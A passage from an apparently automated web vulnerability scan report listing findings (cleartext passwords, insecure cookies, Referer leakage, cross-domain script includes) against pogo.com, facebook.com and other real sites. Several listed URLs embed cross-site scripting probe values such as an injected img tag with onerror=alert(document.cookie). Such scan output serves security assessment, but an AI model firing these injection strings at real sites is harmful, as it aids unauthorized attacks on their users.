3.696. http://www.pogo.com/profiles/k7240 [Referer HTTP header]

3.697. http://www.pogo.com/puzzle-games [Referer HTTP header]

3.698. http://www.pogo.com/puzzle-games [Referer HTTP header]

3.699. http://www.pogo.com/sitemap [Referer HTTP header]

3.700. http://www.pogo.com/word-games [Referer HTTP header]

3.701. http://www.pogo.com/word-games [Referer HTTP header]

3.702. https://www.pogo.com/action/pogo/signin.do [Referer HTTP header]

3.703. https://www.pogo.com/action/pogop/heavyregview.do [Referer HTTP header]

3.704. https://www.pogo.com/action/pogop/welcome.do [Referer HTTP header]

3.705. https://www.pogo.com/surveys/processZipSubs.do [Referer HTTP header]

3.706. https://www.pogo.com/surveys/surveysofferssubs.do [Referer HTTP header]

3.707. http://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header]

3.708. https://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header]

3.709. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js [ruid cookie]

3.710. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js [ruid cookie]

3.711. http://www.e00.peanutlabs.com/js/iFrame/index.php [pl_lang cookie]

3.712. http://www.peanutlabs.com/userGreeting.php [pl_lang cookie]

4. Flash cross-domain policy

5. Cleartext submission of password

5.1. http://activity.livefaceonweb.com/

5.2. http://diythemes.com/thesis/

5.3. http://mail.cmsinter.net/Login.aspx

5.4. http://malsup.com/jquery/form/

5.5. http://malsup.com/jquery/form/

5.6. http://malsup.com/jquery/form/

5.7. http://malsup.com/jquery/form/

5.8. http://malsup.com/jquery/form/

5.9. http://malsup.com/jquery/form/

5.10. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html

5.11. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html

5.12. http://revver.com/video/426755/peanut-labs/

5.13. http://themeforest.net/user/freshface/portfolio

5.14. http://wordpress.org/extend/plugins/wp-pagenavi/

5.15. http://www.43things.com/person/

5.16. http://www.facebook.com/

5.17. http://www.mlive.com/

5.18. http://www.onestat.com/

5.19. http://www.peanutlabs.com/adminLogin.php

5.20. http://www.pogo.com/

5.21. http://www.pogo.com/account/verify-password.do

5.22. http://www.pogo.com/action/pogo/lightregview.do

5.23. http://www.rockband.com/

5.24. http://www.xanga.com/

6. Session token in URL

6.1. http://www.facebook.com/extern/login_status.php

6.2. http://www.pogo.com/account/my-account/main.do

6.3. http://www.slidedeck.com/

7. Password field submitted using GET method

8. ASP.NET ViewState without MAC enabled

8.1. http://beta-ads.ace.advertising.com/

8.2. http://r1.ace.advertising.com/

9. Cookie scoped to parent domain

9.1. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html

9.2. http://www.43things.com/person/

9.3. http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc-

9.4. http://www.peanutlabs.com/peanutlabs/

9.5. http://www.peanutlabs.com/userGreeting.php

9.6. http://ad.doubleclick.net/click

9.7. http://ad.turn.com/server/pixel.htm

9.8. http://admeld.adnxs.com/usersync

9.9. http://ads.adxpose.com/ads/ads.js

9.10. http://altfarm.mediaplex.com/ad/js/55290

9.11. http://b.scorecardresearch.com/b

9.12. http://b.scorecardresearch.com/p

9.13. http://b.scorecardresearch.com/r

9.14. http://board-games.pogo.com/

9.15. http://board-games.pogo.com/games/monopoly

9.16. http://board-games.pogo.com/games/online-chess

9.17. http://board-games.pogo.com/games/risk

9.18. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

9.19. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp

9.20. http://bs.serving-sys.com/BurstingPipe/adServer.bs

9.21. http://card-games.pogo.com/

9.22. http://card-games.pogo.com/games/cribbage

9.23. http://card-games.pogo.com/games/rainy-day-spider-solitaire

9.24. http://click.linksynergy.com/fs-bin/stat

9.25. http://clubpogo-games.pogo.com/

9.26. http://flash-games.pogo.com/

9.27. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js

9.28. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js

9.29. http://optimized-by.rubiconproject.com/a/4252/4762/6942-15.js

9.30. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js

9.31. http://puzzle-games.pogo.com/

9.32. http://puzzle-games.pogo.com/games/bejeweled2

9.33. http://puzzle-games.pogo.com/games/yahtzee-party

9.34. http://r.turn.com/server/pixel.htm

9.35. http://r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64

9.36. http://r1.ace.advertising.com/site=755399/size=300250/u=2/bnum=72318651/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1

9.37. http://r1.ace.advertising.com/site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble

9.38. http://r1.ace.advertising.com/site=777340/size=300600/u=2/bnum=17871065/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F

9.39. http://r1.ace.advertising.com/site=777340/size=300600/u=2/bnum=49979532/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1

9.40. http://www.adobe.com/cfusion/exchange/

9.41. http://www.adobe.com/cfusion/marketplace/index.cfm

9.42. http://www.adobe.com/cfusion/membership/index.cfm

9.43. http://www.adobe.com/cfusion/membership/logout.cfm

9.44. http://www.adobe.com/cfusion/partnerportal/index.cfm

9.45. http://www.adobe.com/cfusion/showcase/index.cfm

9.46. http://www.adobe.com/cfusion/store/html/index.cfm

9.47. http://www.adobe.com/cfusion/support/index.cfm

9.48. http://www.adobe.com/events/main.jsp

9.49. http://www.bbc.co.uk/news/technology-12126880

9.50. http://www.e00.peanutlabs.com/js/iFrame/index.php

9.51. http://www.facebook.com/

9.52. http://www.facebook.com/2008/fbml

9.53. http://www.facebook.com/Pogo

9.54. http://www.facebook.com/campaign/impression.php

9.55. http://www.facebook.com/campaign/landing.php

9.56. http://www.facebook.com/event.php

9.57. http://www.facebook.com/logout.php

9.58. http://www.facebook.com/pages/Packet-Storm-Security/116613458352817

9.59. http://www.facebook.com/peanutlabs

9.60. http://www.facebook.com/sitetour/connect.php

9.61. https://www.facebook.com/login.php

9.62. http://www.gamespot.com/

9.63. http://www.peanutlabs.com/core.php

9.64. http://www.peanutlabs.com/pl/profileSurveyRegister.php

9.65. http://www.peanutlabs.com/publisher/dashboard2/PublisherDashboard.php

9.66. http://www.pogo.com/action/pogo/lightreg.do

9.67. http://www.pogo.com/games/connect.jsp

9.68. http://www.pogo.com/games/scrabble

9.69. http://www.pogo.com/login/entry.jsp

9.70. http://www.pogo.com/login/pogo/setCookie.do

9.71. https://www.pogo.com/fbconnect/js.do

10. Cookie without HttpOnly flag set

10.1. http://ads.adxpose.com/ads/ads.js

10.2. http://diythemes.com/thesis/

10.3. http://event.adxpose.com/event.flow

10.4. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html

10.5. http://www.43things.com/person/

10.6. http://www.adbrite.com/mb/commerce/purchase_form.php

10.7. http://www.adobe.com/cfusion/exchange/

10.8. http://www.adobe.com/cfusion/marketplace/index.cfm

10.9. http://www.adobe.com/cfusion/membership/index.cfm

10.10. http://www.adobe.com/cfusion/membership/logout.cfm

10.11. http://www.adobe.com/cfusion/partnerportal/index.cfm

10.12. http://www.adobe.com/cfusion/showcase/index.cfm

10.13. http://www.adobe.com/cfusion/store/html/index.cfm

10.14. http://www.adobe.com/cfusion/support/index.cfm

10.15. http://www.adobe.com/events/main.jsp

10.16. http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc-

10.17. http://www.peanutlabs.com/peanutlabs/

10.18. http://www.peanutlabs.com/userGreeting.php

10.19. http://www.pixeltrack66.com/mt/w2643334g4y223/

10.20. http://www.thedailynews.cc/

10.21. http://ad.doubleclick.net/click

10.22. http://ad.turn.com/server/pixel.htm

10.23. http://altfarm.mediaplex.com/ad/js/55290

10.24. http://b.scorecardresearch.com/b

10.25. http://b.scorecardresearch.com/p

10.26. http://b.scorecardresearch.com/r

10.27. http://board-games.pogo.com/

10.28. http://board-games.pogo.com/games/monopoly

10.29. http://board-games.pogo.com/games/online-chess

10.30. http://board-games.pogo.com/games/risk

10.31. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

10.32. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

10.33. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp

10.34. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.35. http://card-games.pogo.com/

10.36. http://card-games.pogo.com/games/cribbage

10.37. http://card-games.pogo.com/games/rainy-day-spider-solitaire

10.38. http://click.linksynergy.com/fs-bin/stat

10.39. http://clubpogo-games.pogo.com/

10.40. http://flash-games.pogo.com/

10.41. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js

10.42. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js

10.43. http://optimized-by.rubiconproject.com/a/4252/4762/6942-15.js

10.44. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js

10.45. http://puzzle-games.pogo.com/

10.46. http://puzzle-games.pogo.com/games/bejeweled2

10.47. http://puzzle-games.pogo.com/games/yahtzee-party

10.48. http://r.turn.com/server/pixel.htm

10.49. http://r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64

10.50. http://r1.ace.advertising.com/site=755399/size=300250/u=2/bnum=72318651/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1

10.51. http://r1.ace.advertising.com/site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble

10.52. http://r1.ace.advertising.com/site=777340/size=300600/u=2/bnum=17871065/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F

10.53. http://r1.ace.advertising.com/site=777340/size=300600/u=2/bnum=49979532/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1

10.54. http://www.bbc.co.uk/news/technology-12126880

10.55. http://www.e00.peanutlabs.com/IMG/parent_company.logo_url_medium.80x200.1.1248929690.jpg

10.56. http://www.e00.peanutlabs.com/favicon.ico

10.57. http://www.e00.peanutlabs.com/js/iFrame/index.php

10.58. http://www.e00.peanutlabs.com/js/images/languages/icon_world.png

10.59. http://www.e00.peanutlabs.com/recvMid.php

10.60. http://www.ea.com/

10.61. http://www.ea.com/hasbro

10.62. http://www.ea.com/ipad

10.63. http://www.ea.com/iphone

10.64. http://www.ea.com/mobile

10.65. http://www.ea.com/platform/online-games

10.66. http://www.ea.com/platform/pc-games

10.67. http://www.ea.com/platform/ps3-games

10.68. http://www.ea.com/platform/xbox-360-games

10.69. http://www.ea.com/wii

10.70. http://www.facebook.com/

10.71. http://www.facebook.com/2008/fbml

10.72. http://www.facebook.com/Pogo

10.73. http://www.facebook.com/event.php

10.74. http://www.facebook.com/logout.php

10.75. http://www.facebook.com/pages/Packet-Storm-Security/116613458352817

10.76. http://www.facebook.com/peanutlabs

10.77. http://www.facebook.com/sitetour/connect.php

10.78. https://www.facebook.com/login.php

10.79. http://www.gamespot.com/

10.80. http://www.intellicast.com/

10.81. http://www.intellicast.com/Local/Weather.aspx

10.82. http://www.intellicast.com/Travel/CheapFlightsWidget.htm

10.83. http://www.intellicast.com/favicon.ico

10.84. http://www.peanutlabs.com/core.php

10.85. http://www.peanutlabs.com/pl/profileSurveyRegister.php

10.86. http://www.peanutlabs.com/publisher/dashboard2/PublisherDashboard.php

10.87. http://www.pixeltrack66.com/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409

10.88. http://www.pixeltrack66.com/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409

10.89. http://www.pixeltrack66.com/mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4=

10.90. http://www.pogo.com/action/pogo/lightreg.do

10.91. http://www.pogo.com/games/connect.jsp

10.92. http://www.pogo.com/games/scrabble

10.93. http://www.pogo.com/login/entry.jsp

10.94. http://www.pogo.com/login/pogo/setCookie.do

10.95. https://www.pogo.com/fbconnect/js.do

10.96. http://www.rockband.com/

10.97. http://www.xanga.com/

11. Password field with autocomplete enabled

11.1. http://activity.livefaceonweb.com/

11.2. http://diythemes.com/thesis/

11.3. http://mail.cmsinter.net/Login.aspx

11.4. http://mail.cmsinter.net/Login.aspx

11.5. http://malsup.com/jquery/form/

11.6. http://malsup.com/jquery/form/

11.7. http://malsup.com/jquery/form/

11.8. http://malsup.com/jquery/form/

11.9. http://malsup.com/jquery/form/

11.10. http://malsup.com/jquery/form/

11.11. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html

11.12. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html

11.13. http://themeforest.net/user/freshface/portfolio

11.14. http://wordpress.org/extend/plugins/wp-pagenavi/

11.15. http://www.43things.com/person/

11.16. http://www.adbrite.com/mb/commerce/purchase_form.php

11.17. http://www.adbrite.com/mb/commerce/purchase_form.php

11.18. http://www.facebook.com/

11.19. http://www.facebook.com/

11.20. http://www.facebook.com/

11.21. http://www.facebook.com/2008/fbml

11.22. http://www.facebook.com/Pogo

11.23. http://www.facebook.com/pages/Packet-Storm-Security/116613458352817

11.24. http://www.facebook.com/peanutlabs

11.25. https://www.facebook.com/connect/uiserver.php

11.26. https://www.facebook.com/login.php

11.27. http://www.gamespot.com/

11.28. http://www.mlive.com/

11.29. http://www.onestat.com/

11.30. http://www.pandora.com/login.vm

11.31. http://www.pandora.com/people/

11.32. http://www.peanutlabs.com/adminLogin.php

11.33. http://www.pogo.com/

11.34. http://www.pogo.com/account/verify-password.do

11.35. http://www.pogo.com/action/pogo/lightregview.do

11.36. https://www.pogo.com/action/pogo/signin.do

11.37. http://www.rockband.com/

11.38. http://www.weather.com/

11.39. http://www.weather.com/weather/local/48617

11.40. http://www.weather.com/weather/local/48858

11.41. http://www.weather.com/weather/local/48879

11.42. http://www.weather.com/weather/local/USMI0020

11.43. http://www.xanga.com/

12. Source code disclosure

13. Referer-dependent response

13.1. http://www.facebook.com/extern/login_status.php

13.2. http://www.facebook.com/plugins/activity.php

13.3. http://www.facebook.com/plugins/like.php

13.4. https://www.pogo.com/action/pogop/welcome.do

14. Cross-domain POST

14.1. http://blog.pandora.com/pandora/archives/2007/07/

14.2. http://diythemes.com/thesis/

14.3. http://themeforest.net/user/freshface/portfolio

14.4. http://www.cmsinter.net/

14.5. http://www.pandora.com/static/ads/media-kit/advertising.html

15. SSL cookie without secure flag set

15.1. https://www.facebook.com/login.php

15.2. https://www.pogo.com/fbconnect/js.do

16. Cross-domain Referer leakage

16.1. http://ad.doubleclick.net/adi/N2998.Centro/B5116224.2

16.2. http://ad.doubleclick.net/adi/N3285.weather/B2343920.105

16.3. http://ad.doubleclick.net/adi/N3285.weather/B2343920.98

16.4. http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144

16.5. http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144

16.6. http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144

16.7. http://ad.doubleclick.net/adj/N6457.4298.ADVERTISING.COM/B4840137.13

16.8. http://ad.doubleclick.net/adj/home.pogo/spotlight

16.9. http://ad.doubleclick.net/adj/home.pogo/spotlight

16.10. http://ad.doubleclick.net/adj/ic.us.wx/fcst

16.11. http://ad.doubleclick.net/adj/pand.default/prod.backstage

16.12. http://admeld.adnxs.com/usersync

16.13. http://ads.bluelithium.com/st

16.14. http://board-games.pogo.com/games/monopoly

16.15. http://download-games.pogo.com/

16.16. http://download-games.pogo.com/

16.17. http://download-games.pogo.com/AllGames.aspx

16.18. http://download-games.pogo.com/AllGames.aspx

16.19. http://download-games.pogo.com/Category.aspx

16.20. http://download-games.pogo.com/Category.aspx

16.21. http://download-games.pogo.com/deluxe.aspx

16.22. http://download-games.pogo.com/deluxe.aspx

16.23. http://download-games.pogo.com/deluxe.aspx

16.24. http://download-games.pogo.com/downloads.aspx

16.25. http://game3.pogo.com/error/java-problem.jsp

16.26. http://game3.pogo.com/exhibit/game/game.jsp

16.27. http://game3.pogo.com/exhibit/intermission.jsp

16.28. http://game3.pogo.com/exhibit/loading/loading.jsp

16.29. http://game3.pogo.com/exhibit/loading/loading.jsp

16.30. http://jqueryui.com/themeroller/

16.31. http://word-games.pogo.com/

16.32. http://word-games.pogo.com/games/scrabble

16.33. http://www.adbrite.com/mb/commerce/purchase_form.php

16.34. http://www.adobe.com/cfusion/marketplace/index.cfm

16.35. http://www.cmsinter.net/

16.36. http://www.cmsinter.net/

16.37. http://www.cmsinter.net/blog/

16.38. http://www.e00.peanutlabs.com/js/iFrame/sc.php

16.39. http://www.facebook.com/

16.40. http://www.facebook.com/Pogo

16.41. http://www.facebook.com/plugins/activity.php

16.42. http://www.facebook.com/plugins/facepile.php

16.43. http://www.facebook.com/plugins/like.php

16.44. http://www.intellicast.com/Local/Weather.aspx

16.45. http://www.pandora.com/

16.46. http://www.pandora.com/login.vm

16.47. http://www.peanutlabs.com/js/iFrame/sc.php

16.48. http://www.peanutlabs.com/publisher/dashboard2/PublisherDashboard.php

16.49. http://www.pogo.com/

16.50. http://www.pogo.com/

16.51. http://www.pogo.com/all-games

16.52. http://www.pogo.com/arcade-sports-games

16.53. http://www.pogo.com/board-games

16.54. http://www.pogo.com/club-pogo

16.55. http://www.pogo.com/games/scrabble

16.56. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp

16.57. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp

16.58. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp

16.59. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp

16.60. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp

16.61. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp

16.62. http://www.pogo.com/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp

16.63. http://www.pogo.com/misc/advertise.jsp

16.64. http://www.pogo.com/oberon/navheader.jsp

16.65. http://www.pogo.com/oberon/navheader.jsp

16.66. http://www.pogo.com/prize/prize.do

16.67. http://www.pogo.com/sitemap

16.68. http://www.pogo.com/word-games

16.69. https://www.pogo.com/action/pogo/signin.do

16.70. https://www.pogo.com/action/pogo/signin.do

16.71. https://www.pogo.com/action/pogo/signin.do

16.72. https://www.pogo.com/action/pogo/signin.do

16.73. https://www.pogo.com/action/pogo/signin.do

16.74. https://www.pogo.com/action/pogo/signin.do

16.75. https://www.pogo.com/action/pogo/signin.do

16.76. https://www.pogo.com/action/pogo/signin.do

16.77. https://www.pogo.com/action/pogo/signin.do

16.78. https://www.pogo.com/action/pogo/signin.do

16.79. https://www.pogo.com/action/pogo/signin.do

16.80. https://www.pogo.com/action/pogo/signin.do

16.81. https://www.pogo.com/action/pogo/signin.do

16.82. https://www.pogo.com/surveys/surveysofferssubs.do

16.83. http://www.slidedeck.com/

17. Cross-domain script include

17.1. http://ad.doubleclick.net/adi/N2998.Centro/B5116224.2

17.2. http://ad.doubleclick.net/adi/N3285.weather/B2343920.105

17.3. http://ad.doubleclick.net/adi/N3285.weather/B2343920.98

17.4. http://blog.pandora.com/faq/

17.5. http://blog.pandora.com/pandora/

17.6. http://blog.pandora.com/pandora/archives/arizona/

17.7. http://blog.pandora.com/pandora/archives/california/

17.8. http://blog.pandora.com/pandora/archives/colorado/

17.9. http://blog.pandora.com/pandora/archives/florida/

17.10. http://blog.pandora.com/pandora/archives/georgia/

17.11. http://blog.pandora.com/pandora/archives/illinois/

17.12. http://blog.pandora.com/pandora/archives/indiana/

17.13. http://blog.pandora.com/pandora/archives/louisiana/

17.14. http://blog.pandora.com/pandora/archives/maine/

17.15. http://blog.pandora.com/pandora/archives/maryland/

17.16. http://blog.pandora.com/pandora/archives/massachusetts/

17.17. http://blog.pandora.com/pandora/archives/michigan/

17.18. http://blog.pandora.com/pandora/archives/minnesota/

17.19. http://blog.pandora.com/pandora/archives/mississippi/

17.20. http://blog.pandora.com/pandora/archives/missouri/

17.21. http://blog.pandora.com/pandora/archives/nebraska/

17.22. http://blog.pandora.com/pandora/archives/new-jersey/

17.23. http://blog.pandora.com/pandora/archives/new-york/

17.24. http://blog.pandora.com/pandora/archives/north-carolina/

17.25. http://blog.pandora.com/pandora/archives/north-dakota/

17.26. http://blog.pandora.com/pandora/archives/ohio/

17.27. http://blog.pandora.com/pandora/archives/oregon/

17.28. http://blog.pandora.com/pandora/archives/other-states/

17.29. http://blog.pandora.com/pandora/archives/other_states/index.html

17.30. http://blog.pandora.com/pandora/archives/pennsylvania/

17.31. http://blog.pandora.com/pandora/archives/play-listen-repeat/

17.32. http://blog.pandora.com/pandora/archives/rhode-island/

17.33. http://blog.pandora.com/pandora/archives/roadtrip/

17.34. http://blog.pandora.com/pandora/archives/roadtrip/index.html

17.35. http://blog.pandora.com/pandora/archives/south-daktoa/

17.36. http://blog.pandora.com/pandora/archives/tennessee/

17.37. http://blog.pandora.com/pandora/archives/texas/

17.38. http://blog.pandora.com/pandora/archives/utah/

17.39. http://blog.pandora.com/pandora/archives/virginia/

17.40. http://blog.pandora.com/pandora/archives/washington-dc/

17.41. http://blog.pandora.com/pandora/archives/washington/

17.42. http://board-games.pogo.com/games/monopoly

17.43. http://dean.edwards.name/weblog/2006/06/again/

17.44. http://diythemes.com/thesis/

17.45. http://game3.pogo.com/error/java-problem.jsp

17.46. http://game3.pogo.com/exhibit/game/game.jsp

17.47. http://game3.pogo.com/exhibit/intermission.jsp

17.48. http://game3.pogo.com/exhibit/loading/loading.jsp

17.49. http://game3.pogo.com/exhibit/loading/loading.jsp

17.50. http://jqueryui.com/about

17.51. http://jqueryui.com/themeroller/

17.52. http://malsup.com/jquery/form/

17.53. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html

17.54. http://r1.ace.advertising.com/site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble

17.55. http://r1.ace.advertising.com/site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble

17.56. http://revver.com/video/426755/peanut-labs/

17.57. http://themeforest.net/user/freshface/portfolio

17.58. http://word-games.pogo.com/

17.59. http://wordpress.org/extend/plugins/wp-pagenavi/

17.60. http://www.adobe.com/special/offers.html

17.61. http://www.adobe.com/training/

17.62. http://www.bbc.co.uk/news/technology-12126880

17.63. http://www.e00.peanutlabs.com/js/iFrame/sc.php

17.64. http://www.ea.com/

17.65. http://www.ea.com/hasbro

17.66. http://www.ea.com/ipad

17.67. http://www.ea.com/iphone

17.68. http://www.ea.com/mobile

17.69. http://www.ea.com/platform/online-games

17.70. http://www.ea.com/platform/pc-games

17.71. http://www.ea.com/platform/ps3-games

17.72. http://www.ea.com/platform/xbox-360-games

17.73. http://www.ea.com/wii

17.74. http://www.facebook.com/

17.75. http://www.facebook.com/2008/fbml

17.76. http://www.facebook.com/Pogo

17.77. http://www.facebook.com/pages/Packet-Storm-Security/116613458352817

17.78. http://www.facebook.com/peanutlabs

17.79. http://www.facebook.com/plugins/activity.php

17.80. http://www.facebook.com/plugins/activity.php

17.81. http://www.facebook.com/plugins/facepile.php

17.82. http://www.facebook.com/plugins/like.php

17.83. http://www.facebook.com/plugins/like.php

17.84. http://www.facebook.com/xd_receiver_v0.4.php

17.85. http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc-

17.86. http://www.freshnews.com/news/3881925a24d%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E29cb609e200/a

17.87. http://www.gamespot.com/

17.88. http://www.intellicast.com/

17.89. http://www.intellicast.com/Local/Weather.aspx

17.90. http://www.mlive.com/

17.91. http://www.pandora.com/

17.92. http://www.pandora.com/backstage

17.93. http://www.pandora.com/facebook/xd_receiver.htm

17.94. http://www.pandora.com/login.vm

17.95. http://www.pandora.com/people/

17.96. http://www.peanutlabs.com/js/iFrame/sc.php

17.97. http://www.pogo.com/

17.98. http://www.pogo.com/

17.99. http://www.pogo.com/

17.100. http://www.pogo.com/action/pogo/confirmation.do

17.101. http://www.pogo.com/action/pogo/lightregview.do

17.102. http://www.pogo.com/all-games

17.103. http://www.pogo.com/all-games

17.104. http://www.pogo.com/arcade-sports-games

17.105. http://www.pogo.com/arcade-sports-games

17.106. http://www.pogo.com/board-games

17.107. http://www.pogo.com/cash-games

17.108. http://www.pogo.com/games/scrabble

17.109. http://www.pogo.com/oberon/navheader.jsp

17.110. http://www.pogo.com/oberon/navheader.jsp

17.111. http://www.pogo.com/prize/prize.do

17.112. http://www.pogo.com/word-games

17.113. https://www.pogo.com/action/pogo/signin.do

17.114. https://www.pogo.com/action/pogop/heavyregview.do

17.115. https://www.pogo.com/surveys/processZipSubs.do

17.116. https://www.pogo.com/surveys/surveysofferssubs.do

17.117. https://www.pogo.com/surveys/surveysofferssubs.do

17.118. http://www.rockband.com/

17.119. http://www.slidedeck.com/

17.120. http://www.thedailynews.cc/

17.121. http://www.thedailynews.cc/siteimages/featurephoto/cleardot.gif

17.122. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_1.jpg

17.123. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_2.jpg

17.124. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_3.jpg

17.125. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_4.jpg

17.126. http://www.weather.com/

17.127. http://www.weather.com/weather/local/48617

17.128. http://www.weather.com/weather/local/48858

17.129. http://www.weather.com/weather/local/48879

17.130. http://www.weather.com/weather/local/USMI0020

17.131. http://www.xanga.com/

17.132. http://www1.peanutlabs.com/

17.133. http://www1.peanutlabs.com/4-tips-to-better-monetize-social-games-with-offers/

17.134. http://www1.peanutlabs.com/author/admin/

17.135. http://www1.peanutlabs.com/author/alex-dempsey/

17.136. http://www1.peanutlabs.com/become-a-publisher/

17.137. http://www1.peanutlabs.com/peanut-labs-acquired-by-e-rewards-silo-breaker/

17.138. http://www1.peanutlabs.com/peanut-labs-acquired-by-online-research-company-e-rewards-2/

17.139. http://www1.peanutlabs.com/peanut-labs-inc-announces-acquisition-by-e-rrewards-inc/

17.140. http://www1.peanutlabs.com/social-networking-survey-startup-peanut-labs-sold-to-e-rewards-paidcontent/

17.141. http://www1.peanutlabs.com/social-networking-survey-startup-peanut-labs-sold-to-e-rewards/

17.142. http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js

17.143. http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/10/

17.144. http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/11/

17.145. http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/2/

17.146. http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/3/

17.147. http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/4/

17.148. http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/5/

18. File upload functionality

19. Directory listing

20. Email addresses disclosed

20.1. http://blog.pandora.com/pandora/

20.2. http://blog.pandora.com/pandora/archives/2005/08/

20.3. http://blog.pandora.com/pandora/archives/2005/11/

20.4. http://blog.pandora.com/pandora/archives/2006/01/

20.5. http://blog.pandora.com/pandora/archives/2006/02/

20.6. http://blog.pandora.com/pandora/archives/2006/03/

20.7. http://blog.pandora.com/pandora/archives/2006/04/

20.8. http://blog.pandora.com/pandora/archives/2006/05/

20.9. http://blog.pandora.com/pandora/archives/2006/06/

20.10. http://blog.pandora.com/pandora/archives/2006/07/

20.11. http://blog.pandora.com/pandora/archives/2006/08/

